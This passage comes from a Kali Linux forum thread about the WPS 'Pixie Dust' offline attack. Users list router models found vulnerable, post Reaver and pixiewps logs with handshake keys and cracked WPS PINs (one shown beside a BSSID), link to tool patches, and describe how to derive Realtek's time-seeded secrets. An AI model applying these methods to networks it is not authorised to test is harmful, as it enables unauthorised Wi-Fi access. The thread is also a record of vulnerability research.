Page 4 of 12 FirstFirst 123456789101112 LastLast
Results 151 to 200 of 583

Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #151
    Join Date
    2014-Oct
    Posts
    42
    Thanks soxrok2212.

  2. #152
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by aanarchyy View Post
    [P] WPS Manufacturer: ENCORE Technologies, Inc.
    [P] WPS Model Number: ENHWI-3GN3
    Ralink chipset: RT3050

    Confirmed Vulnerable.

    https://wikidevi.com/wiki/Encore_ENHWI-3GN3
    Thanks... added to the list!

  3. #153
    Join Date
    2015-Mar
    Posts
    127
    Add to the database as attack successful.
    Arris models:
    TG1672
    DG1670

    Used in Time Warner foot print. Model not listed on wikidevi. chipset not listed in chip uid database.
    I would guess ralink chipset.
    Reaver mod list wps manufacturer - "Celeno Communication, Inc.", model - "CL1800".

  4. #154
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Are you using pixiewps? Because if you use that and it says E-S1 and E-S2 = 00000000, then its Ralink. Otherwise is Broadcom.

  5. #155
    Join Date
    2015-Mar
    Posts
    127
    yes pixiewps. ralink
    E-S1 and E-S2 = 00000000, shown

  6. #156
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Sweet thanks! I'll add them to the database

  7. #157
    Join Date
    2015-Mar
    Posts
    141
    TG862G seems to be a bit of a hit-or-miss, this one did not accept the "secret" pin, but was still vulnerable.

    Code:
    [P] E-Nonce: b1:55:f2:0b:09:dd:44:63:8b:f2:e1:94:d8:90:5e:e0
    [P] PKE: bd:98:1b:00:24:0a:08:96:85:92:9c:5b:21:e8:bf:7e:2e:f3:0f:6c:ea:c1:4d:85:ba:af:58:7e:63:c4:f0:92:ef:8a:90:f4:d4:5a:b0:59:33:18:ae:ac:31:9e:a0:ed:b8:16:fe:bd:9c:b6:e1:aa:0e:5a:72:c8:9d:31:89:0b:ed:1f:45:e5:34:8c:ea:74:d5:35:f4:4a:13:1d:92:81:fd:e9:4d:42:88:4b:ea:ed:ef:ff:16:aa:c0:4f:3b:8f:fe:bc:f5:e7:ec:96:7e:c7:06:4b:5a:3b:20:0a:7b:72:14:4b:75:b1:25:2e:b9:a7:41:e9:4c:67:87:07:2b:a4:7a:c6:02:c2:91:9a:60:10:d8:5e:ca:fb:87:26:b2:3f:ca:3e:94:16:3c:7c:d6:60:e1:54:11:78:78:d6:f6:95:01:10:a8:ed:11:bf:12:52:85:cc:02:77:32:2a:d3:2d:63:e3:bd:23:a1:dc:27:98:55:4c:c5:5a:ae:d4:8b:48
    [P] WPS Manufacturer: ARRIS
    [P] WPS Model Number: RT2860
    [+] Received M1 message
    [P] AuthKey: d5:c6:8d:34:3b:bf:9f:33:24:15:c4:3a:39:f7:84:73:b8:f1:1e:ea:02:fc:b2:1e:6f:65:fe:56:ac:df:8a:9d
    [+] Sending M2 message
    [P] E-Hash1: 74:d7:4f:96:17:d9:77:0e:2d:7e:d7:3b:67:a6:e1:0a:cb:ab:eb:f9:23:bd:69:a6:59:f2:ff:1d:27:c8:fc:8b
    [P] E-Hash2: f1:2e:03:65:55:9f:9c:21:73:e5:a7:4b:0a:27:ca:fe:46:d1:49:8c:c8:9b:9d:f1:17:70:61:b7:c3:8b:3d:34
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 11 seconds
    [+] WPS PIN: '56276053'
    [+] WPA PSK: 'PASSWORD_HERE'
    [+] AP SSID: 'HOME-XXXX'
    [+] Nothing done, nothing to save.
    I've still yet to come across one that accepted both pins.
    EDIT: Noticed this one had a different chipset than the others I've seen, maybe the "secret" pin is more revision or chipset specific?
    Wish i could change my nick to what it was when i was a dev on the (now very defunct) knoppix-std team...
    Last edited by aanarchyy; 2015-04-08 at 05:16.

  8. #158
    If you want to manually patch reaver yourself:

    Reaver v1.4 (Official release) #r119 ~ 2013-10-20
    Homepage: https://code.google.com/p/reaver-wps/
    Patch: http://pastebin.com/raw.php?i=mkeKYppU

    Reaver v1.5 (Community fork) #8 - 2014-01-04
    Homepage: https://code.google.com/p/reaver-wps-fork/
    Patch: http://pastebin.com/raw.php?i=gQFcBbtW
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: https://tools.kali.org/

  9. #159
    Join Date
    2015-Mar
    Posts
    54
    Quote Originally Posted by g0tmi1k View Post
    If you want to manually patch reaver yourself:

    Reaver v1.4 (Official release) #r119 ~ 2013-10-20
    Homepage: https://code.google.com/p/reaver-wps/
    Patch: http://pastebin.com/raw.php?i=mkeKYppU

    Reaver v1.5 (Community fork) #8 - 2014-01-04
    Homepage: https://code.google.com/p/reaver-wps-fork/
    Patch: http://pastebin.com/raw.php?i=gQFcBbtW
    Thank you.

    I think in the near future I might modify the program so that it won't depend on a modded version of Reaver but just on the standard one.

  10. #160
    For what its worth, both pixiewps and the patched version of reaver have made it into the Kali repos:

    PixieWPS (New): https://bugs.kali.org/view.php?id=2203
    Reaver (Patched): https://bugs.kali.org/view.php?id=2210
    This is a Kali-Linux support forum - not general IT/infosec help.

    Useful Commands: OS, Networking, Hardware, Wi-Fi
    Troubleshooting: Kali-Linux Installation, Repository, Wi-Fi Cards (Official Docs)
    Hardware: Recommended 802.11 Wireless Cards

    Documentation: http://docs.kali.org/ (Offline PDF version)
    Bugs Reporting & Tool Requests: https://bugs.kali.org/
    Kali Tool List, Versions & Man Pages: https://tools.kali.org/

  11. #161
    Join Date
    2013-Oct
    Posts
    15
    soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...

    Another one to add to the list as vulnerable:-

    Zyxel P-2812HNU - Wikidevi here

    Code:
    [P] WPS Manufacturer: ZyXEL Technology, Corp.
    [P] WPS Model Number: V3.11(TUJ.3)
    [+] Received M1 message
    [P] AuthKey: 85:5f:fc:cb:b8:...
    [+] Sending M2 message
    [P] E-Hash1: 66:29:ae:09:ab:...
    [P] E-Hash2: 81:a4:d5:58:f3:...
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 3 seconds
    [+] WPS PIN: '37********'
    [+] WPA PSK: '**********'
    [+] AP SSID: '**********'
    [+] Nothing done, nothing to save.
    Last edited by Calamita; 2015-04-08 at 18:07.

  12. #162
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Calamita View Post
    soxrok2212, I tried messaging you on the Google Drive sheet but it looked as though you couldn't respond...

    Another one to add to the list as vulnerable:-

    Zyxel P-2812HNU - Wikidevi here

    Code:
    [P] WPS Manufacturer: ZyXEL Technology, Corp.
    [P] WPS Model Number: V3.11(TUJ.3)
    [+] Received M1 message
    [P] AuthKey: 85:5f:fc:cb:b8:...
    [+] Sending M2 message
    [P] E-Hash1: 66:29:ae:09:ab:...
    [P] E-Hash2: 81:a4:d5:58:f3:...
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M5 message
    [+] Sending M6 message
    [+] Received M7 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [+] Pin cracked in 3 seconds
    [+] WPS PIN: '37********'
    [+] WPA PSK: '**********'
    [+] AP SSID: '**********'
    [+] Nothing done, nothing to save.
    Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!

  13. #163
    Join Date
    2013-Oct
    Posts
    15
    Quote Originally Posted by soxrok2212 View Post
    Sorry I just leave that page open because I'm constantly editing it... don't really check the chat. Thanks for posting!
    Ahh ok - no worries! Thanks for your hard work on this.

    I'll report back with some more vulnerable devices soon hopefully

  14. #164
    Join Date
    2015-Mar
    Posts
    4
    Why it doesn't work on Broadcoms? I thought that the exploit was for broadcoms

    model number 123456

  15. #165
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by Calamita View Post
    Ahh ok - no worries! Thanks for your hard work on this.

    I'll report back with some more vulnerable devices soon hopefully
    If you find any Realtek AP's please post all the info you can about them.. especially the PKe! Thanks!

  16. #166
    Join Date
    2015-Mar
    Posts
    141
    Quote Originally Posted by soxrok2212 View Post
    If you find any Realtek AP's please post all the info you can about them.. especially the PKe! Thanks!
    Is that helping you work on that flaw you mentioned you found?

    BTW heres the one for that Encore i posted the other day

    Code:
    [P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21
    [P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1:b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:76:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5:a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22:b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de:56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0:35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:ba:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84:76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d:b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b3:86:9f:a4:09:ff:82:d6:c1
    [P] WPS Manufacturer: ENCORE Technologies, Inc.
    [P] WPS Model Number: ENHWI-3GN3
    [P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de:ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1
    [P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b:ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96
    [P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68:b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac

  17. #167
    Join Date
    2015-Mar
    Posts
    127
    Cisco Linksys RE1000 v2, vulnerable.

    ES-1, ES-2 00:00:00:00:00............................. ralink chipset. wikidevi here
    Last edited by nuroo; 2015-04-08 at 20:48.

  18. #168
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by aanarchyy View Post
    Is that helping you work on that flaw you mentioned you found?

    BTW heres the one for that Encore i posted the other day

    Code:
    [P] E-Nonce: 0f:2f:e4:f3:ed:a6:74:d5:97:d6:33:b9:0b:e2:4c:21
    [P] PKE: ef:80:72:86:a3:e9:5e:11:ac:93:cf:68:2f:d6:75:ad:d1:b8:eb:b9:b4:b4:0a:2b:72:e4:f5:ca:70:76:6f:70:25:76:9a:f2:34:75:31:07:b8:24:36:2d:28:b1:8f:47:bb:d5:a5:d9:e7:6f:30:f6:ce:c5:80:55:ae:ba:0a:e9:22:67:22:b9:69:27:71:a1:8b:2d:a6:ff:55:52:de:5d:95:ff:50:e3:eb:e8:d9:a3:f8:7a:cd:d0:d2:ec:a0:ec:5f:6f:87:de:56:28:80:d5:68:c6:c3:c2:0d:55:8d:43:8a:fd:b8:5c:d0:35:0c:13:28:32:27:18:17:89:a8:4c:44:45:04:8b:1b:ba:0a:b2:c3:17:e4:80:73:00:6a:6c:fd:9b:fb:97:83:84:76:a8:22:77:fc:c3:84:78:00:76:2d:1d:74:f5:02:f6:5d:b3:d4:d5:9a:e0:df:f8:19:b3:db:6d:75:c1:3b:13:f8:b3:86:9f:a4:09:ff:82:d6:c1
    [P] WPS Manufacturer: ENCORE Technologies, Inc.
    [P] WPS Model Number: ENHWI-3GN3
    [P] AuthKey: c3:d9:55:00:ba:6c:b1:1f:fc:d1:eb:68:e1:1a:30:52:de:ef:a2:ca:ca:be:eb:78:c9:3b:df:0a:02:03:9f:e1
    [P] E-Hash1: 1b:25:bf:af:80:54:60:aa:b9:c6:22:34:2d:f7:c3:20:6b:ef:fe:09:d6:97:17:56:bb:4b:e0:38:ed:38:9a:96
    [P] E-Hash2: 62:b5:b4:d2:17:32:c8:00:33:65:2e:a1:83:8b:2b:e7:68:b3:3e:fb:76:4f:6c:5f:7e:bb:16:71:56:8e:04:ac
    Unfortunately, thats Ralink, not Realtek. Thanks though.

    Quote Originally Posted by nuroo View Post
    Cisco Linksys RE1000 v2, vulnerable.

    ES-1, ES-2 00:00:00:00:00............................. ralink chipset. wikidevi here
    Thanks! I'll add it now

  19. #169
    Join Date
    2013-Oct
    Posts
    15
    Will do! I saw your post on hackforums about this too PM me your details and I'll forward any info I find to you

  20. #170
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    This is all the info I need.

    Code:
    Authkey: 
    N1 Enrollee Nonce: 
    N2 Registrar Nonce: 
    PKe: 
    E-Hash1: 
    E-Hash2:
    Optional but extremely helpful information:
    Code:
    Router Manufacturer: 
    Router Model Name/Number: 
    Router WPS Pin:
    Last edited by soxrok2212; 2015-05-06 at 21:28.

  21. #171
    Join Date
    2015-Mar
    Posts
    141
    ****, sorry. Didn't even notice...

  22. #172
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    Quote Originally Posted by soxrok2212 View Post
    This is all the info I need.


    Optional but extremely helpful information:
    the BSSID first 3 sets could be very useful as a quick ID chart. It's not included for most models on the wikidevi.
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  23. #173
    Join Date
    2014-Oct
    Posts
    42
    14:CF:E2:AC:E7:50
    Manufacturer: Celeno Communication, Inc.
    Model Number: CL1800
    WPS Pin: 28944294
    Vulnerable!

  24. #174
    Join Date
    2013-Sep
    Posts
    264
    we need to know : model of chipset
    model of chipset shown in the probes
    thanks for your collaboration

  25. #175
    Join Date
    2014-Oct
    Posts
    42
    Quote Originally Posted by kcdtv View Post
    we need to know : model of chipset
    model of chipset shown in the probes
    thanks for your collaboration
    In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in wireshark could I get more info on the device itself?

  26. #176
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Probe request or m1 message in a WPS exachange

  27. #177
    Join Date
    2015-Mar
    Posts
    141
    Check your messages, soxrok2212

  28. #178
    Join Date
    2014-Nov
    Posts
    7
    How do I make the reaver (forked) spill out the PKR too?

  29. #179
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    We weren't alble to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the m2 message with wireshark... "Public Key"

  30. #180
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    So many of you probably know that I was looking into Realtek recently, and I noticed some fishy stuff that they do. First of all, Realtek APs ALL generated the SAME PKe. Not just on 1 occasion, not just on 1 AP, but multiple. All generated the same PKe. This seemed very strange and insecure. A person could find the secret number used in the DH Key exchange and this could be used for a MITM attack for instance, but it is not the actual problem.

    Anyways, I contacted Dominique, send him some test data from a Realtek AP, a firmware blablabla, and he came back to me with the conclusion that Realtek can be cracked in 2 different, but similar ways.

    1- Assuming the attacker does a WPS exchange in 1 second, E-S1 = E-S2 = N1 Enrollee Nonce
    Wow, stupid engineering right? The actual PRNG is found here: https://github.com/skristiansson/uCl...lib/random_r.c
    The seed that this generator uses is the time. So assuming everything happens in 1 second, your E-S1 and E-S1 will equal the N1 Enrollee Nonce.

    2- If your exchange doesn't happen within 1 second, you can simply brute force the seed for the PRNG (kinda similar to Broadcom). All you have to do is input different times. Then, you will have E-S1 and E-S2.

    Amazing. And they thought this was a secure implementation? Nope.

    The only drawback for this attack is you can't use small PKr DH Keys so at the moment, you need Wireshark or just do a hex dump to get the PKr. Not that big of a deal though. Wiire updated pixiewps within about 10 minutes of me telling him all the info and has already released it, what a champ!

  31. #181
    Join Date
    2014-Oct
    Posts
    44
    Quote Originally Posted by psicomantis View Post
    In the cases where reaver is only giving this Manufacturer: Celeno Communication, Inc. and Model Number: CL1800, where in wireshark could I get more info on the device itself?
    check the fcc id on sticker and use FCC ID lookup tool.
    you can find on google.
    or post your FCC ID here and i'll grab it for you

  32. #182
    Join Date
    2014-Nov
    Posts
    7
    Quote Originally Posted by soxrok2212 View Post
    We weren't alble to find where in reaver the PKR is debugged. It's probably in there somewhere but we just use small DH keys because the value is always 2. If you really need it without DH keys, just look in the m2 message with wireshark... "Public Key"
    M1, M3, M5, M7 is seen at wps_registar.c
    M2, M4, M6, M8 is seen at wps_enrollee.c

    The PKE is in wps_process_pubkey() of wps_registar.c so the PKR might probably be in wps_process_pubkey() of wps_enrollee.c file.

    Have you tested this?

  33. #183
    Join Date
    2013-Oct
    Posts
    15
    More awesome work all!

    I've not found any Realtek AP's yet - which manufacturer have you gathered data from at the moment?

  34. #184
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Right now I've only tested a Belkin F9k1105v2. I had other data to try but unfortunately they used small DH keys. Somehow, small DH keys screw up Realtek cracking. Not sure why but otherwise it does work

  35. #185
    Join Date
    2015-Apr
    Posts
    9
    I think this one is Realtek the wiki page shows it's Realtek but Reaver just show the name of the Router itself

    Here is the Info:

    Authkey:d3:91:85:00:01:57:be:86:5e:52:10:fe:73:ff: ae:c1:15:0d:d3:01:99:15:67:5a:b1:ba:a0:bb:85:c3:bf :f2
    N1 Enrollee Nonce: 3a:ad:19:14:4f:5a:1d:87:1f:27:ed:1b:3c:fb:a6:18
    PKe:d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0 d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91: 66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21 :25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4 d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9: 85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a :ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:3 3:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82: 51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6 :61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:1 0:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c: eb:a9:e3:b4:22:4f:3d:89:fb:2b
    E-Hash1: 83:b9:24:05:e4:d2:60:c0:c3:15:7f:70:59:e2:e0:0c:86 :54:1b:7b:81:d8:50:4c:f4:01:2e:6d:f7:3f:08:8b
    E-Hash2: 40:8c:4d:b0:82:29:32:04:6e:7e:f6:91:78:65:4d:3d:dd :9a:18:26:f7:28:1b:ff:32:0b:05:e4:a6:9b:17:f1
    PKr:87:10:92:c3:7c:dd:9d:00:ba:80:18:16:20:d4:f4:6 0:d6:1e:1d:f2:fe:7f:e6:ed:c5:4d:49:c6:a1:82:4a:9b: f2:05:9f:6b:27:d6:f2:ee:24:e2:1e:12:66:d5:02:25:48 :92:7e:5c:3e:9d:78:2d:b2:af:49:3b:af:4f:dd:62:e0:2 8:00:6b:4c:09:62:6e:c3:19:6e:e3:c2:c6:45:44:e2:50: 0d:40:b9:0f:a6:cc:ae:13:0e:56:10:2a:c0:07:55:1e:db :07:ad:fc:29:ef:1a:ce:59:a9:ad:27:7d:0b:73:2b:4f:1 c:17:17:de:cd:06:7c:31:34:91:e6:09:ee:97:68:67:68: 66:6f:c0:05:bf:f3:a3:4e:25:1a:fd:39:a2:9a:02:86:7d :0d:4d:c1:80:b5:da:22:f7:04:1f:12:98:e4:ad:27:56:d 4:49:8a:9f:1b:01:d6:39:dd:61:c2:53:09:99:0a:dd:f9: a0:fa:3b:3e:f3:7c:f3:7b:81:f3

    Router Manufacturer: Technicolor
    Router Model Name/Number:Technicolor TD5

  36. #186
    Join Date
    2015-Mar
    Posts
    127
    Wanna help. The modded reaver makes getting the necessary keys super easy. The Realtek attack needs more info then modded reaver gives.
    Is there a tool that will extract all needed data, easily for a noob? I want to help, not sure how to use wireshark.
    Last edited by nuroo; 2015-04-11 at 12:41.

  37. #187
    Join Date
    2013-Aug
    Location
    lost in space
    Posts
    580
    FrankenScript could do that. I'll ask Slim to add it in the next version, if it's ok with everyone, whenever he gets back...
    Kali Linux USB Installation using LinuxLive USB Creator
    Howto Install HDD Kali on a USB Key
    Clean your laptop fan | basic knowledge

  38. #188
    Join Date
    2015-Mar
    Posts
    127
    Manufacturer
    Belkin International

    Model
    F9K1103

    pixiewps attack works, small dh keys used. (good thing, cant understand wireshark yet)
    wikidevi here

    WI1 chip1: Ralink RT3883
    WI2 chip1: Ralink RT3092

  39. #189
    Join Date
    2015-Apr
    Posts
    39
    I'm working on a modification of reaver to automate the whole process.

    Soon I post

  40. #190
    Join Date
    2015-Apr
    Posts
    39
    This is a example

    [+] Switching mon0 to channel 9
    [?] Restore previous session for 64:70:02:535:FA? [n/Y] n
    [+] Waiting for beacon from 64:70:02:535:FA
    [+] Associated with 64:70:02:535:FA (ESSID: t6)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: d7:5b:a5:c1:be:a9:23:da:......
    [P] PKE: d5:2e:5f:2e:58:ee:d0:3e:f2:d0:18:bc:a2:c9:be:da:91 :6e:b5:81:0f:5a:ee:30:0f:7b:00:ea:bf:86:73:86:b8:f f:24:f7:........
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 1.0
    [+] Received M1 message
    [P] PKR: 01:38:b1:f2:38:52:5f:cc:8a:e5:0e:00:30:5f:15:b2:e3 :88:86:68:1c:c1:b4:6d:a9:80:45:dd:c8:cd:07:8a:a1:1 8:45:.......
    [+] Sending M2 message
    [P] E-Hash1: ee:a0:46:ba:b1:e3:80:29:cd:80:0b:b2:e2:..........
    [P] E-Hash2: 59:43:8b:93:7a:79:b1:d9:ef:7a:d6:b0:50:.....
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK


    I added you on skype soxrok2212

  41. #191
    Join Date
    2015-Apr
    Posts
    15
    VULNERABLE:

    Modell: Hitron CVE 360
    WPS Manufacturer: Ralink Technology, Corp.
    WPS Model Number: RT2860

    E-Nonce: 0e:3e:ee:d8:97:3d:a4:f1:ed:8d:b6:3a:9c:31:b2:30
    PKE:f0:bc:40:a6:c4:8f:85:eb:e0:6b:47:96:f3:7f:7c:b d:34:a2:cd:ed:c6:79:09:f7:6f:de:75:a1:b9:4c:ef:ff: 0c:be:ff:81:e1:f6:6c:76:33:c7:6e:3c:58:79:36:af:71 :b8:20:a9:3b:11:03:0c:b9:ef:ff:3e:d8:23:29:49:62:1 3:8a:ae:1c:24:74:bf:71:89:dd:b4:ea:a7:2d:eb:04:83: fd:17:d8:84:a3:b9:11:bf:63:d8:6a:56:59:4c:bd:a2:9a :44:e8:72:95:06:82:0a:af:d3:de:45:8a:ef:6d:23:ad:3 5:12:64:39:49:e5:ab:f1:c0:07:f8:5b:5d:00:c9:d5:39: 8c:ac:79:c5:7a:40:29:fb:f5:a6:e3:c6:e5:57:cb:50:25 :ce:f1:18:8c:ae:b4:25:c3:4a:c8:5b:c3:aa:76:21:53:b 3:a1:19:14:c0:34:b8:61:21:67:c2:fa:7c:b1:a4:6a:8c: 95:97:c3:fd:4c:26:d1:97:54:52
    AuthKey: 76:f9:c0:a7:4c:dc:7a:c5:2e:65:56:02:a6:df:0d:62:0d :9a:3f:a0:7a:d4:fb:94:af:72:4b:92:f1:26:3e:70
    E-Hash1: 4d:0d:e2:7b:b0:0e:7b:4a:15:81:a6:0a:e1:4c:91:3d:73 :a2:c7:2e:30:45:69:89:0d:cb:0f:ab:97:d9:7f:f1
    E-Hash2: d7:df:23:9a:7d:20:74:80:fe:e6:1b:eb:00:19:49:43:35 :8e:05:72:0f:e0:dd:5c:45:a9:a4:a5:dc:e0:09:14

    NOT VULNERABLE:

    Modell: E1000 - Linksys
    Chip: Broadcom BCM4716B0 (300 MHz)


    E-Nonce: f1:04:09:09:1b:b4:a2:57:17:9a:f9:07:4b:a4:a5:70
    PKE:96:4e:dd:2c:9e:8a:a4:4d:77:cf:e5:31:65:39:9d:0 8:15:c8:da:8c:33:74:37:96:eb:b1:e5:83:b2:d4:fe:79: ee:cf:8b:7f:46:f3:c8:0e:01:04:ab:0c:f6:f5:b1:d2:11 :8c:ad:7a:4d:3d:b7:98:cb:75:4b:d7:37:37:01:05:a8:b 4:63:49:18:e2:2f:99:52:90:4a:54:9e:98:89:e3:d1:97: 11:36:a0:c8:da:9f:19:05:28:a1:5f:66:03:d4:21:a3:eb :be:b0:58:8e:8b:6b:48:c9:df:b4:a9:af:23:e5:ed:40:7 7:dc:c2:ee:c9:2f:c7:c7:a5:1e:79:ad:d4:34:fc:00:b3: f1:eb:6d:e9:64:6a:d7:7b:97:ea:d2:77:a3:e4:19:4b:64 :00:ce:6e:7b:06:02:6c:21:11:cb:8b:a5:a2:e8:8e:8f:5 4:5f:c7:23:5e:08:5d:00:4a:e1:94:e0:84:0e:6d:50:d5: 8b:f7:46:53:a2:32:22:cf:5a:f7
    PKR:28:bc:09:26:90:73:5f:24:bb:23:9a:89:49:b5:aa:9 e:30:cd:98:60:eb:5e:52:a8:08:82:e4:75:b7:3f:84:5b: 87:a6:b0:f6:d2:9e:4d:9e:0e:c7:0e:99:b7:69:1e:d7:7b :11:4e:a8:d0:42:77:b8:48:43:36:b6:ec:2f:0f:4c:c3:0 3:98:c8:18:3b:07:1c:b4:7a:17:80:90:25:93:91:b5:16: 4f:0a:83:95:36:92:95:63:a1:fb:50:41:18:b3:c8:4d:bc :a5:43:32:87:93:a4:27:1d:b7:aa:08:7d:1f:7b:f7:20:2 0:e8:a7:e9:af:29:9c:44:95:af:7d:aa:02:81:bb:29:71: 34:67:07:57:c8:64:7a:01:f3:26:7f:98:a3:0a:27:aa:b8 :b8:ab:40:39:60:3a:51:82:ac:de:60:e5:ad:2a:bf:e5:2 c:9d:b4:2a:fb:ec:16:a2:b6:7f:03:bb:0e:bb:65:16:72: e8:86:3b:af:03:1d:57:87:ea:26
    AuthKey: 98:e5:4a:b4:53:ad:1b:9a:56:ff:df:5c:65:0d:1d:0d:1b :6c:b3:8f:ec:a8:7e:c2:d4:34:28:96:e4:ee:5a:85
    E-Hash1: 2a:5e:0d:41:71:48:2e:bf:42:c0:c7:5d:78:6e:d5:d5:0c :51:82:20:21:91:b2:2d:f0:74:e4:14:f5:fa:a9:fd
    E-Hash2: 63:c7:21:cb:d7:7c:1d:0c:50:55:22:de:0e:e4:7c:d4:4a :94:7c:b7:61:97:07:7f:ed:0c:7c:7f:99:ba:4e:d0

    Modell: TL-WR841N - TP-Link

    E-Nonce: 9b:0f:a4:49:82:5b:5b:ff:ea:e6:ee:dc:15:75:f1:bc
    PKE:e5:dd:ed:96:42:29:30:4c:d5:fe:00:94:4a:6c:44:d 5:f9:f3:72:f4:e1:cd:83:3d:4b:7c:00:e2:0b:33:95:a5: 75:1b:8c:0e:f4:0a:36:a6:1c:2d:63:36:fd:47:9a:65:3f :4a:26:3c:13:ac:85:75:01:31:94:cc:29:a2:ac:0b:eb:1 a:2c:5c:36:63:65:15:17:c2:36:6e:4a:71:65:be:ca:bd: d5:86:6b:db:f7:90:38:cd:a2:95:1f:af:12:eb:24:af:f1 :62:7c:df:8f:2a:bb:94:98:5e:65:62:39:8a:19:75:fa:a c:dd:98:36:f0:77:44:fe:59:9d:65:3a:cd:ed:d1:b7:52: c0:ed:93:99:a1:8d:54:5b:55:c5:8a:c0:0f:1e:c9:5e:e9 :cc:bd:b8:1e:88:e9:6d:06:a4:21:35:cc:a5:30:40:5d:4 d:08:e3:aa:92:0a:fd:0a:84:0f:d5:11:07:2e:fe:05:e3: 70:72:ea:fa:b9:93:60:85:8d:bf
    AuthKey: 6c:fa:cd:30:17:d5:ee:87:b4:c7:ff:c9:de:8e:20:7c:95 :27:f6:62:f5:16:48:55:84:04:ef:85:33:40:54:43
    E-Hash1: 89:c6:62:2d:c8:c3:b7:24:ef:ca:c7:79:2a:83:0e:f5:ed :9c:1d:a4:fd:20:b2:e1:61:a7:81:c1:f9:30:40:01
    E-Hash2: cd:a0:79:3b:4e:12:f9:e2:c8:e7:14:34:51:3a:2d:75:eb :0f:c8:42:0b:de:4d:1d:1e:29:e1:4b:bd:d1:d7:72
